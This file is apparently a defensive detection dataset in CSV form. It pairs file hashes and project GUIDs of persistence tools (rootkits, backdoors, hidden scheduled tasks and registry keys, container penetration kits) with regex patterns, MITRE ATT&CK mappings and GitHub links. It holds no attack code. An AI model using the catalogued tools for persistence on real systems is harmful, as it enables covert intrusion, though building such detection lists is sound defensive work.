"*64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced*",".{0,1000}64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f*",".{0,1000}66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#filehash","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc*",".{0,1000}66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72*",".{0,1000}67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8*",".{0,1000}67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9*",".{0,1000}68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1*",".{0,1000}68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306*",".{0,1000}697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf*",".{0,1000}6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7*",".{0,1000}6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e*",".{0,1000}6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3*",".{0,1000}6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329*",".{0,1000}6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z"
"*6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186*",".{0,1000}6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f*",".{0,1000}6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04*",".{0,1000}6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#filehash","N/A","N/A","9","873","184","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z"
"*6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3*",".{0,1000}6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#filehash","N/A","9","5","474","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
"*70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86*",".{0,1000}70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*7271AFD1-10F6-4589-95B7-3ABF98E7B2CA*",".{0,1000}7271AFD1\-10F6\-4589\-95B7\-3ABF98E7B2CA.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2*",".{0,1000}72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b*",".{0,1000}72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435*",".{0,1000}73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479*",".{0,1000}74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560*",".{0,1000}752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121*",".{0,1000}762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621*",".{0,1000}770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6*",".{0,1000}78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596*",".{0,1000}7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","#filehash","N/A","10","10","1435","256","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z"
"*784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e*",".{0,1000}784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*78BB6D02-6E02-4933-89DC-4AD8EE0B303F*",".{0,1000}78BB6D02\-6E02\-4933\-89DC\-4AD8EE0B303F.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760*",".{0,1000}7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","141","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z"
"*7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1*",".{0,1000}7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718*",".{0,1000}7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ*",".{0,1000}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*7B4D3810-4A77-44A1-8546-779ACF02D083*",".{0,1000}7B4D3810\-4A77\-44A1\-8546\-779ACF02D083.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","#GUIDproject","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6*",".{0,1000}7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535*",".{0,1000}7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d*",".{0,1000}7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f*",".{0,1000}802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*811683b1-e01c-4ef8-82d1-aa08293d3e7c*",".{0,1000}811683b1\-e01c\-4ef8\-82d1\-aa08293d3e7c.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","#GUIDproject","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3*",".{0,1000}81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","#filehash","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*81f14b29b131156c433a46709e83bbe8deeee87c4bb9db4d45171ece944f6612*",".{0,1000}81f14b29b131156c433a46709e83bbe8deeee87c4bb9db4d45171ece944f6612.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817*",".{0,1000}825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92*",".{0,1000}828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038*",".{0,1000}8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93*",".{0,1000}86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*86F8C733-F773-4AD8-9282-3F99953261FD*",".{0,1000}86F8C733\-F773\-4AD8\-9282\-3F99953261FD.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918*",".{0,1000}8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3*",".{0,1000}8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8*",".{0,1000}8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e*",".{0,1000}8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4*",".{0,1000}896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76*",".{0,1000}8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6*",".{0,1000}8b6d83c919ad123d4b27f3404604e99eeba9196cf81f3210a65d8ae1b89465a6.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
